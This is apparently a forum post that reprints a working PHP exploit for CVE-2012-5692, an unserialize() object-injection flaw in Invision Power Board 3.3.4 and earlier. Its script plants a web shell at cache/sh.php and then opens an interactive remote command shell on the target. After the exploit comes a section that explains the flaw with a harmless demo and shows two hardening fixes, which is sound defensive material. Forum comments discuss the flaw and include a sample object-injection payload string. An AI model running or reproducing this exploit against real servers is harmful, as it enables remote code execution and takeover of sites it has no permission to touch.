<?php
/*
----------------------------------------------------------------
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
----------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: http://www.invisionpower.com/
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php
4015. static public function get($name)
4016. {
4017. // Check internal data first
4018. if ( isset( self::$_cookiesSet[ $name ] ) )
4019. {
4020. return self::$_cookiesSet[ $name ];
4021. }
4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
4023. {
4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
4025.
4026. if ( substr( $_value, 0, 2 ) == 'a:' )
4027. {
4028. return unserialize( stripslashes( urldecode( $_value ) ) );
4029. }
The vulnerability is caused by this method unserializing user input passed through cookies without proper
sanitization. The only check is done at line 4026, which verifies that the serialized string starts
with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a
serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code
via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug
info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable; for this
reason successful exploitation of this vulnerability requires short_open_tag to be enabled.
[-] Disclosure timeline:
[21/10/2012] - Vulnerability discovered
[23/10/2012] - Vendor notified
[25/10/2012] - Patch released: http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update
[25/10/2012] - CVE number requested
[29/10/2012] - Assigned CVE-2012-5692
[31/10/2012] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+---------------------------------------------------------------------+";
print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
class db_driver_mysql
{
public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
$payload = urlencode(serialize(array(new db_driver_mysql)));
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");
while(1)
{
print "\nipb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
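The advisory above explains that the `substr($_value, 0, 2) == 'a:'` check in IPSCookie::get() does not stop object injection, because a serialized array may contain objects. The following is an added example, not code from the original post or from the IPB code base: it reproduces the check with a harmless demo class (the class name `DemoLogger`, its destructor and the cookie contents are all constructed for this demo) and shows two ways a maintainer could harden the same method, either by refusing object instantiation during unserialize() (the `allowed_classes` option, PHP 7.0 and later) or by switching the cookie format to JSON, which cannot encode PHP objects at all.

```php
<?php
// Added example, not part of the original post or of IPB. The class and
// cookie value below are constructed for the demo.

class DemoLogger
{
    public $obj = array('use_debug_log' => 1, 'debug_log' => 'demo.log');

    // A destructor that acts on a path taken from an attacker-controlled
    // property is the pattern that made dbMain exploitable. This demo
    // destructor only echoes instead of writing a file.
    public function __destruct()
    {
        echo "[destructor ran] would write log to: " . $this->obj['debug_log'] . "\n";
    }
}

// Pattern from the advisory: only the first two characters are checked,
// so an array containing objects passes and the objects are instantiated.
function vulnerable_get($raw)
{
    if (substr($raw, 0, 2) == 'a:') {
        return unserialize(stripslashes(urldecode($raw)));
    }
    return null;
}

// Hardened variant 1: same format, but object creation is refused. Every
// "O:" entry becomes __PHP_Incomplete_Class, so no constructor, __wakeup()
// or destructor of a real class ever runs. Requires PHP >= 7.0.
function hardened_get_unserialize($raw)
{
    if (substr($raw, 0, 2) != 'a:') {
        return null;
    }
    $data = unserialize(stripslashes(urldecode($raw)), array('allowed_classes' => false));
    return is_array($data) ? $data : null;
}

// Hardened variant 2: store the cookie as JSON instead. JSON has no object
// instantiation semantics, so this closes the whole class of bug. The code
// that writes the cookie must use json_encode() for this to work.
function hardened_get_json($raw)
{
    $data = json_decode(urldecode($raw), true);
    return (json_last_error() === JSON_ERROR_NONE && is_array($data)) ? $data : null;
}

// Constructed cookie: an array wrapping one DemoLogger, which passes the
// 'a:' prefix check. Written by hand so no DemoLogger is created up front.
$cookie = urlencode(
    'a:1:{i:0;O:10:"DemoLogger":1:{s:3:"obj";a:2:{'
    . 's:13:"use_debug_log";i:1;s:9:"debug_log";s:8:"demo.log";}}}'
);

echo "--- vulnerable_get ---\n";
$v = vulnerable_get($cookie);
var_dump($v[0] instanceof DemoLogger);   // bool(true): a real object was built
unset($v);                               // destructor fires here

echo "--- hardened_get_unserialize ---\n";
$h = hardened_get_unserialize($cookie);
var_dump($h[0] instanceof __PHP_Incomplete_Class);   // bool(true): no DemoLogger
unset($h);                                           // nothing runs

echo "--- hardened_get_json ---\n";
var_dump(hardened_get_json($cookie));    // NULL: serialized PHP is not JSON
var_dump(hardened_get_json(urlencode(json_encode(array('member_id' => 42)))));
```

Run it with `php demo.php`: the first section prints the destructor line, the second does not. Variant 1 is the smallest change to existing code, but variant 2 is the one to prefer for new code, since `allowed_classes` still leaves `__PHP_Incomplete_Class` objects in the data and any later code that re-serializes or type-checks them has to cope with that.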
11 comments
Learning from this.
Learning from this.
https://t00ls.net/thread-21022-1-1.html I posted this earlier,,
No need to merge; you've already replied, and it's on the first page anyway, so anyone who reads the thread will see the reply.
This is the fundamental difference: researchers abroad study vulnerabilities in PHP's underlying layer, in its functions, so the vulnerabilities they find are mostly about how each function is used, while most domestic work is based on logic and usage patterns. For example the old mail() bypass, where wide bytes could be used to execute OS commands: if nobody here publishes or researches it, that kind of vulnerability just stays at a certain level. So I think real code auditing still cannot do without digging at the underlying layer. http://packetstormsecurity.org publishes function vulnerabilities and how they are triggered, or overflows, and then a pile of vulnerabilities is derived from them. For example the big shot Stefan Esser seems to still be working on cracking Apple; among people abroad studying PHP auditing, EgiX is also good, and I also came across 鸟F19ht, not sure whether that is the domestic one, I think it should be. ======================================================== Exploiting unserialize() is still a bit difficult; I remember exp examples for this being published at a previous Black Hat conference. Anything you find on Baidu about unserialize() notes this about the function; the references below have the details. Passing data through the function and its relation to memory feels a bit like an overflow. unserialize.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;} Heh, it is not that hard to understand. Well, dear, please merge this with the main post; this one is more detailed, no objection, right? O(∩_∩)O~
Is there an actual example of code execution or injection through serialization, bro?
IPB hasn't had such a sharp hole in a long time..
unserialize can execute code: use unserialize to trigger functions inside the class such as __construct(), and exploit it through those.
Invision Power Board, this is really the first time I've seen this program... It seems rarely used domestically?
Also, the cookie they set themselves is member_id, but in the program it is ipsRegistry::$settings['cookie_id'].$name ...
I don't quite get it: you use serialize to change the cookie value yourself, and then when the program unserializes it, because we changed the order of the values, the original values get overwritten and then the code is executed?? Is there a more detailed analysis?